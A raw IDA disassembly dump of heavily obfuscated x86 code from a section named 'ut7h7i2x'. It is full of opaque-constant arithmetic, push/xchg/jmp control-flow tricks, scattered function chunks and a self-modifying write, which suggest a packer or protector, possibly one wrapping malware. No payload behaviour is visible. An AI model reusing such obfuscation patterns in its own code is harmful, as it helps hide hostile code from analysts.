; FUNCTION CHUNK AT 00440204 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444A36 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004458B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B195 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044CBB2 SIZE 00000010 BYTES
xchg ebx, [esp+0]
pop ebx
add edx, 5952BB39h
mov [edx], eax
pop edx
call sub_44DC72
loc_451F4B: ; CODE XREF: ut7h7i2x:0045372Aj
jmp loc_444A36
sub_451F39 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_451F50: ; CODE XREF: ut7h7i2x:0044E896j
ror eax, 9
push ecx
push 8FD2DB26h
xchg edx, [esp]
mov ecx, edx
jmp loc_444F96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_451F63: ; CODE XREF: sub_43FF65+13D56j
rol eax, 6
loc_451F66: ; CODE XREF: sub_43FF65:loc_453CB3j
xor esi, 83FEBD3Ch
add esi, 38B352CDh
popf
xchg esi, [esp-4+arg_0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_43FF65
; =============== S U B R O U T I N E =======================================
sub_451F7B proc near ; CODE XREF: sub_44C95Bj
; DATA XREF: sub_43C9F5+FF5Co
add edi, 5D3ECDF1h
xchg edi, [esp+0]
jmp sub_43AA94
sub_451F7B endp
; =============== S U B R O U T I N E =======================================
sub_451F89 proc near ; CODE XREF: sub_44E2AA-4C62p
; ut7h7i2x:00450A7Fj
xchg eax, [esp+0]
pop eax
call sub_453D8B
push offset sub_43B106
jmp loc_43EC03
sub_451F89 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F69F
loc_451F9C: ; CODE XREF: sub_43F69F+Ej
popf
loc_451F9D: ; CODE XREF: ut7h7i2x:00441142j
push esi
mov esi, eax
call sub_439AE7
loc_451FA5: ; CODE XREF: ut7h7i2x:00455B31j
jmp nullsub_12
; END OF FUNCTION CHUNK FOR sub_43F69F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_451FAA: ; CODE XREF: sub_4518D7-5E62j
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_4518D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45114D
loc_451FB0: ; CODE XREF: sub_45114D+Cj
jmp loc_449841
; END OF FUNCTION CHUNK FOR sub_45114D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_451FB5: ; CODE XREF: sub_453E14-EFBEj
jmp loc_4563E1
; END OF FUNCTION CHUNK FOR sub_453E14
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_451FBB: ; CODE XREF: sub_43CCC3+16D3Aj
jmp loc_43D862
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_451FC0: ; CODE XREF: sub_4529E0-1247j
jmp loc_4572CF
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_451FC5: ; CODE XREF: sub_450231-1127j
jz loc_451CB2
jmp loc_44472D
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_451FD0: ; CODE XREF: sub_43F7A5+143B5j
jp loc_448C4A
cdq
; END OF FUNCTION CHUNK FOR sub_43F7A5
; START OF FUNCTION CHUNK FOR sub_44C273
loc_451FD7: ; CODE XREF: sub_43F7A5:loc_443527j
; sub_44C273:loc_44DC31j ...
pop ecx
xchg esi, [esp+0]
mov ebp, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CB0D
loc_451FDF: ; CODE XREF: sub_43CB0D+18j
jmp loc_450AD6
; END OF FUNCTION CHUNK FOR sub_43CB0D
; ---------------------------------------------------------------------------
loc_451FE4: ; CODE XREF: ut7h7i2x:00450AE3j
; ut7h7i2x:00452D70j
call sub_44E2C4
jmp loc_44D285
; ---------------------------------------------------------------------------
dw 1B0h
dd 33D2FF5Ah, 0FC4589C0h, 87FC458Bh, 0CE8B2434h, 0FF8442E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4584FE
loc_452005: ; CODE XREF: sub_4584FE+7j
call sub_44E6A8
; END OF FUNCTION CHUNK FOR sub_4584FE
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_45200A: ; CODE XREF: sub_43CFB6+37A8j
jmp loc_4410D2
; END OF FUNCTION CHUNK FOR sub_43CFB6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_398. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_452010: ; CODE XREF: ut7h7i2x:0043C285j
jmp loc_447290
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_472. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_452016: ; CODE XREF: ut7h7i2x:loc_43ADF8j
; ut7h7i2x:0043AE15j
xor edi, ds:4000FAh
add edi, 0A68BFED4h
xchg edi, [esp]
jmp loc_43B4DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_45202A: ; CODE XREF: sub_444273:loc_44514Ej
add eax, 0D945E66Ah
ja loc_448EF9
jg loc_43DBCA
jmp loc_44BE51
; END OF FUNCTION CHUNK FOR sub_444273
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44305D
loc_452042: ; CODE XREF: sub_44305D+11183j
jmp loc_444F1E
; END OF FUNCTION CHUNK FOR sub_44305D
; ---------------------------------------------------------------------------
loc_452047: ; CODE XREF: ut7h7i2x:0043D0B5j
jmp loc_44E6F1
; ---------------------------------------------------------------------------
loc_45204C: ; CODE XREF: ut7h7i2x:0044F3FFj
jnz loc_448BEE
; =============== S U B R O U T I N E =======================================
sub_452052 proc near ; CODE XREF: sub_44E8A5-F02Cp
xchg eax, [esp+0]
pop eax
add edi, 470C85B2h
push offset loc_4553FB
jmp nullsub_140
sub_452052 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_452066: ; CODE XREF: sub_444374+FD48j
push eax
loc_452067: ; CODE XREF: ut7h7i2x:loc_459D26j
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_45206D: ; CODE XREF: sub_44F495+9E6j
jmp loc_447640
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_452072: ; CODE XREF: sub_4433C5-7624j
jmp loc_43B6C1
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_452077: ; CODE XREF: sub_4431FF+12146j
call sub_43F117
sub eax, ds:dword_44A870
shr eax, 11h
jz loc_451FD7
jmp loc_44E218
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_452090: ; CODE XREF: sub_44B122:loc_44A9ACj
jnb loc_43D6EF
mov esi, 0D02A3D84h
jmp loc_43D6E7
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
loc_4520A0: ; CODE XREF: ut7h7i2x:0045172Aj
xor ebx, 172EBAFFh
add ebx, 0CD68325Dh
popf
xchg ebx, [esp]
jmp sub_43AA94
; ---------------------------------------------------------------------------
xchg edx, [eax]
sub esi, 7A431907h
jmp sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4520C2: ; CODE XREF: sub_439BF8:loc_455662j
mov esi, [ebp+0]
loc_4520C5: ; CODE XREF: ut7h7i2x:loc_44C6C4j
pushf
jmp loc_43B068
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_4520CB: ; CODE XREF: sub_43EF73:loc_4471B2j
jl loc_444F68
; END OF FUNCTION CHUNK FOR sub_43EF73
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4520D1: ; CODE XREF: sub_439BF8+8D47j
; sub_4423C1+100B4j
jmp loc_43FD12
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
sub ecx, ebx
jnp loc_44DFB8
pushf
jmp loc_444F64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E9E4
loc_4520E4: ; CODE XREF: sub_44E9E4+5844j
pop edi
or edi, 744FF7CCh
add edi, 83F4C42Ah
xchg edi, [esp+4+var_4]
jmp loc_451CA2
; END OF FUNCTION CHUNK FOR sub_44E9E4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_4520FA: ; CODE XREF: sub_4489DF+9CB6j
jmp loc_44E9AD
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
loc_4520FF: ; CODE XREF: ut7h7i2x:loc_43D3DBj
cmp edi, 64899E8Ah
jmp loc_43F1C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_45210A: ; CODE XREF: sub_4459EE:loc_444893j
pop ecx
sub ecx, 947E0037h
and ecx, ds:4000F3h
loc_452117: ; CODE XREF: sub_43A1DB+9j
add ecx, 0E03938F3h
jmp loc_455E75
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_452122: ; CODE XREF: sub_459653:loc_441956j
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
push eax
mov eax, [ebp-18h]
jmp loc_444881
; END OF FUNCTION CHUNK FOR sub_459653
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452AAF
loc_452137: ; CODE XREF: sub_452AAF:loc_44348Ej
or eax, 7D9CA3E6h
add eax, 2614C11h
and ecx, eax
pop eax
mov eax, 1
shl eax, cl
push offset loc_43A88E
jmp loc_44F74E
; END OF FUNCTION CHUNK FOR sub_452AAF
; ---------------------------------------------------------------------------
loc_452157: ; CODE XREF: ut7h7i2x:0043A68Bj
jl loc_43A53B
mov [esi], ebx
; =============== S U B R O U T I N E =======================================
sub_45215F proc near ; CODE XREF: sub_4490B0+7p
; FUNCTION CHUNK AT 0043B1D5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448D7D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
cmp ds:dword_43A79C, 0
jz loc_441291
mov eax, ds:dword_43A79C
mov eax, [eax]
jmp loc_448D7D
sub_45215F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_45217C: ; CODE XREF: sub_43A513+1299Ej
call sub_455E89
pop ecx
mov [ebp-20h], eax
loc_452185: ; CODE XREF: sub_43A513-19Cj
; sub_456C93-9DF5j ...
call sub_44FC60
loc_45218A: ; CODE XREF: ut7h7i2x:00456E1Bj
jmp loc_442DCE
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4454EA
loc_45218F: ; CODE XREF: sub_4454EA:loc_43D4ABj
pop eax
add eax, 0F6AE61Ch
or eax, 0F7C654A5h
add eax, 11020Ch
call sub_4459EE
; END OF FUNCTION CHUNK FOR sub_4454EA
; START OF FUNCTION CHUNK FOR sub_441A79
loc_4521A7: ; CODE XREF: sub_441A79:loc_45AD98j
mov edi, ebp
pop ebp
xor edi, 0B722B1F1h
or edi, 5C1B14C8h
add edi, 80E8F1BFh
mov [edi], eax
pop edi
jmp loc_4496E2
; END OF FUNCTION CHUNK FOR sub_441A79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452303
loc_4521C4: ; CODE XREF: sub_452303:loc_451E02j
mov edi, esi
push offset loc_45A6FF
jmp nullsub_536
; END OF FUNCTION CHUNK FOR sub_452303
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_4521D0: ; CODE XREF: sub_43E6CC+14j
jz loc_43B01F
jmp loc_43FF48
; END OF FUNCTION CHUNK FOR sub_43E6CC
; =============== S U B R O U T I N E =======================================
sub_4521DB proc near ; CODE XREF: ut7h7i2x:0043DBBFj
; sub_43D021+C347p
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
xchg edx, [esp-4+arg_0]
jmp sub_453D8B
sub_4521DB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 0BF19D329h
pop edx
and edx, 677ABC47h
jmp loc_443DF2
; ---------------------------------------------------------------------------
jo loc_43BF7C
adc esi, edx
jmp sub_44EEAA
; ---------------------------------------------------------------------------
locret_452205: ; CODE XREF: ut7h7i2x:00442A6Fj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_452206: ; CODE XREF: sub_44DEFF-13083j
jmp loc_44A9B6
; END OF FUNCTION CHUNK FOR sub_44DEFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_45220B: ; CODE XREF: sub_439AE7+1E0D6j
or ecx, 3AED0712h
sub ecx, 44DACF1h
or ecx, 0DEC37CC4h
add ecx, 161F200h
xchg ecx, [esp+0]
jmp loc_448BEE
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_45222B: ; CODE XREF: sub_44FDF2:loc_4395CEj
; sub_4433C5:loc_4445CFj
jnz loc_44A1B1
jmp loc_44F6A4
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A76A
loc_452236: ; CODE XREF: sub_43A76A:loc_43ACB1j
jnz loc_459B68
jmp loc_441C78
; END OF FUNCTION CHUNK FOR sub_43A76A
; ---------------------------------------------------------------------------
loc_452241: ; CODE XREF: ut7h7i2x:0044DC02j
pop edx
xor edx, 2CD3CAD2h
add edx, ds:4000FAh
xor edx, 0DF3C6BC3h
jmp loc_43B54E
; ---------------------------------------------------------------------------
xor ebx, 5843B37Bh
loc_45225F: ; CODE XREF: ut7h7i2x:0045028Ej
jmp sub_449744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_452264: ; CODE XREF: sub_43B847+Bj
jg loc_444CAA
jmp loc_44475B
; END OF FUNCTION CHUNK FOR sub_43B847
; =============== S U B R O U T I N E =======================================
sub_45226F proc near ; DATA XREF: ut7h7i2x:00452288o
mov ds:dword_453CC0, edx
sub_45226F endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43A0C7
loc_452275: ; CODE XREF: ut7h7i2x:loc_43938Ej
; sub_43A0C7+8j
xchg eax, edx
call sub_44ED9F
retn
; END OF FUNCTION CHUNK FOR sub_43A0C7
; ---------------------------------------------------------------------------
loc_45227C: ; CODE XREF: ut7h7i2x:00454A8Bj
jmp loc_45349E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_452281: ; CODE XREF: sub_439BF8+DDD9j
jmp loc_44293D
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
pop edx
pop eax
push offset sub_45226F
jmp loc_457723
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4573BA
loc_452292: ; CODE XREF: sub_4573BA:loc_455445j
sub edx, 5148B84Fh
xor edx, 3F86A384h
push edi
push 7D7FB21Ah
jmp loc_456282
; END OF FUNCTION CHUNK FOR sub_4573BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_4522A9: ; CODE XREF: sub_439BD1+EFEEj
xor eax, ecx
loc_4522AB: ; CODE XREF: sub_439BD1:loc_448BB3j
and eax, 82E2E5DDh
or eax, 3F13050Ah
xor eax, 0E756A983h
add eax, 9BBE4D15h
add eax, ebp
add eax, 8BBC063Eh
mov eax, [eax]
jmp loc_454151
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_4522D2: ; CODE XREF: ut7h7i2x:loc_4552C3j
jz loc_4443A9
jmp loc_44AB82
; =============== S U B R O U T I N E =======================================
sub_4522DD proc near ; CODE XREF: ut7h7i2x:0043903Fj
; sub_446CA0+1EB2p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004418F9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045308A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454870 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00454B80 SIZE 0000001A BYTES
xchg eax, [esp+0]
pop eax
xor edx, edx
push ecx
mov ecx, edx
jmp loc_454B80
sub_4522DD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4522EB proc near ; CODE XREF: ut7h7i2x:0043EF98p
; ut7h7i2x:004467B0j
xchg edx, [esp+0]
pop edx
call sub_4396F5
mov eax, 0DD1C4F2h
call sub_43AA94
sub_4522EB endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4522FE: ; CODE XREF: sub_4459EE:loc_44069Dj
jmp loc_43FF43
; END OF FUNCTION CHUNK FOR sub_4459EE
; =============== S U B R O U T I N E =======================================
sub_452303 proc near ; DATA XREF: sub_4584D6+18o
; FUNCTION CHUNK AT 00451DF1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004521C4 SIZE 0000000C BYTES
mov edx, 43A8AC5Ch
call sub_44ED9F
push eax
push 51082412h
pop eax
xor eax, 0BB7F6B94h
rol eax, 0Ch
jmp loc_451DF1
sub_452303 endp
; ---------------------------------------------------------------------------
loc_452322: ; CODE XREF: ut7h7i2x:loc_43F2F1j
or eax, edx
jmp loc_4493EB
; ---------------------------------------------------------------------------
loc_452329: ; DATA XREF: sub_44A3BB+3DEEo
call sub_439B17
cmp eax, [ebp-8]
push offset sub_454361
jmp loc_457508
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454C8C
loc_45233B: ; CODE XREF: sub_454C8C:loc_4426A2j
pop edi
or edi, 783AF6A8h
add edi, 4CA79C9h
popf
xchg edi, [esp-8+arg_4]
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_454C8C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D15F
loc_452351: ; CODE XREF: sub_44D15F:loc_43FB2Bj
jmp ds:off_41D06C
; END OF FUNCTION CHUNK FOR sub_44D15F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_452357: ; CODE XREF: sub_446599+23DEj
jmp loc_44AFA1
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45235C: ; CODE XREF: sub_457A66-1C19Aj
jmp loc_45315E
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_452361 proc near ; CODE XREF: sub_4499DC:loc_446DAAj
; sub_44D15Fp ...
; FUNCTION CHUNK AT 0043A24E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043C8C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E3FB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044041F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443D4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C9C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E5C1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004527EE SIZE 00000014 BYTES
pop edx
jz loc_44E5C1
push offset loc_44520E
jmp nullsub_144
sub_452361 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_176. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_452373: ; CODE XREF: sub_44F43B+77D7j
jmp loc_4471AB
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_452378: ; CODE XREF: sub_4558CC-710j
jmp sub_4558CC
; END OF FUNCTION CHUNK FOR sub_4558CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_45237D: ; CODE XREF: sub_439BF8:loc_443FF0j
pop edx
rol esi, 3
and esi, 0EE0DC8DEh
add esi, 584003DDh
xchg esi, [esp+8+var_8]
jmp sub_45500F
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
push eax
push 0A39F2274h
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_45239B: ; CODE XREF: sub_44E2C4-404Bj
pop eax
or eax, 71075B14h
xor eax, ds:4000F3h
test eax, 10000000h
jmp loc_44FC43
; END OF FUNCTION CHUNK FOR sub_44E2C4
; =============== S U B R O U T I N E =======================================
sub_4523B3 proc near ; DATA XREF: sub_43BA9E:loc_44C6AAo
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043CB77 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0043D6A3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004486EB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044CDAD SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044D7E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DBC7 SIZE 00000005 BYTES
mov eax, [eax]
xor edx, edx
div dword ptr [ebp-8]
push ebx
push 0FC8FB61h
xchg ecx, [esp+0]
mov ebx, ecx
jmp loc_44DBC7
sub_4523B3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4523CA proc near ; DATA XREF: ut7h7i2x:004540EDo
; FUNCTION CHUNK AT 0043BF4A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448D69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D092 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458A29 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045AA80 SIZE 0000000C BYTES
push esi
push 80E344C1h
pop esi
and esi, 772C0E1Ch
xor esi, 45FF5517h
add esi, 0BA20AF25h
jmp loc_458A29
sub_4523CA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_4523E8: ; CODE XREF: sub_456B19-16C09j
pushf
loc_4523E9: ; CODE XREF: sub_456B19:loc_44ABD2j
push 74708147h
pop eax
or eax, 12C2519Fh
push offset loc_43F893
jmp nullsub_406
; END OF FUNCTION CHUNK FOR sub_456B19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D688
loc_4523FF: ; CODE XREF: sub_43D688:loc_447D07j
mov byte ptr [eax], 0C3h
jmp loc_459CEF
; END OF FUNCTION CHUNK FOR sub_43D688
; ---------------------------------------------------------------------------
call nullsub_20
jmp ds:dword_41D190
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_452412: ; CODE XREF: sub_44E688+15j
jmp loc_442182
; END OF FUNCTION CHUNK FOR sub_44E688
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B873
loc_452417: ; CODE XREF: sub_43B873+D7FDj
jmp loc_4464E8
; END OF FUNCTION CHUNK FOR sub_43B873
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443459
loc_45241C: ; CODE XREF: sub_443459+1Fj
jmp loc_4401EA
; END OF FUNCTION CHUNK FOR sub_443459
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_452421: ; CODE XREF: sub_43ADDB+10j
jmp loc_44B67C
; END OF FUNCTION CHUNK FOR sub_43ADDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_452426: ; CODE XREF: sub_439BF8+5DEj
jmp loc_44FBA2
; END OF FUNCTION CHUNK FOR sub_439BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS KEYPAD "+" TO EXPAND]
dd 0FFFED10Dh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_452430: ; CODE XREF: sub_444374+1060Cj
jmp loc_4546F5
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_452435: ; CODE XREF: sub_44825D-FAFj
jmp loc_439131
; END OF FUNCTION CHUNK FOR sub_44825D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_284. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_45243B: ; CODE XREF: sub_446CA0+Aj
push eax
mov eax, [ebp-1Ch]
shl eax, 2
cdq
add eax, [esp+0]
jnz loc_4427CB
adc edx, [esp+4]
jmp loc_45271B
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_452455: ; CODE XREF: sub_442B3B:loc_456444j
jnz loc_45246C
cmp dword ptr [ebp-0Ch], 5
jnz loc_45246C
mov eax, [ebp+8]
or dword ptr [eax-8], 8
; END OF FUNCTION CHUNK FOR sub_442B3B
; START OF FUNCTION CHUNK FOR sub_4423C1
loc_45246C: ; CODE XREF: ut7h7i2x:loc_43F112j
; sub_4423C1+5456j ...
jns loc_4560DB
mov eax, [ebp+8]
jmp loc_4520D1
; END OF FUNCTION CHUNK FOR sub_4423C1
; ---------------------------------------------------------------------------
shr edi, 1Ah
jmp sub_44B45E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_452482: ; CODE XREF: sub_4529E0+55A5j
pop ecx
xor eax, 1083C7FFh
push edx
push 245295F2h
pop edx
jmp loc_43B863
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_452495: ; CODE XREF: sub_455145:loc_44E0CBj
jg loc_4580A4
test ecx, 5E6671D4h
jmp loc_45406A
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4492A1
loc_4524A6: ; CODE XREF: sub_4492A1:loc_45A644j
mov eax, ds:dword_44A86C
or eax, eax
jnz loc_4548EE
jmp loc_44A453
; END OF FUNCTION CHUNK FOR sub_4492A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_4524B9: ; CODE XREF: sub_44F738+5493j
pop ebx
locret_4524BA: ; CODE XREF: sub_44E2E0:loc_44A66Cj
retn
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_4524BB: ; CODE XREF: sub_43C0DA+6j
; sub_44F738:loc_44FDA3j
rol eax, 12h
push esi
mov esi, eax
xchg esi, [esp+0]
jmp loc_459E89
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_4524C9: ; CODE XREF: sub_445188-3E2Fj
and ebx, ecx
adc esi, 6BD482D8h
loc_4524D1: ; CODE XREF: sub_445188:loc_44D910j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_44E828
jmp loc_4464CF
; END OF FUNCTION CHUNK FOR sub_445188
; =============== S U B R O U T I N E =======================================
sub_4524E2 proc near ; DATA XREF: sub_442B3B:loc_45426Bo
; FUNCTION CHUNK AT 0043BC80 SIZE 00000005 BYTES
cmp dword ptr [ebp-14h], 4
jnz loc_45246C
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_43BC80
sub_4524E2 endp
; =============== S U B R O U T I N E =======================================
sub_4524FE proc near ; CODE XREF: ut7h7i2x:00444247j
; sub_454C20+11p
; FUNCTION CHUNK AT 004391AD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00439B81 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00439C78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C1CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DB70 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043DE51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DE68 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EF4F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043F01A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043FB7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004409CA SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00446D89 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446F1C SIZE 00000004 BYTES
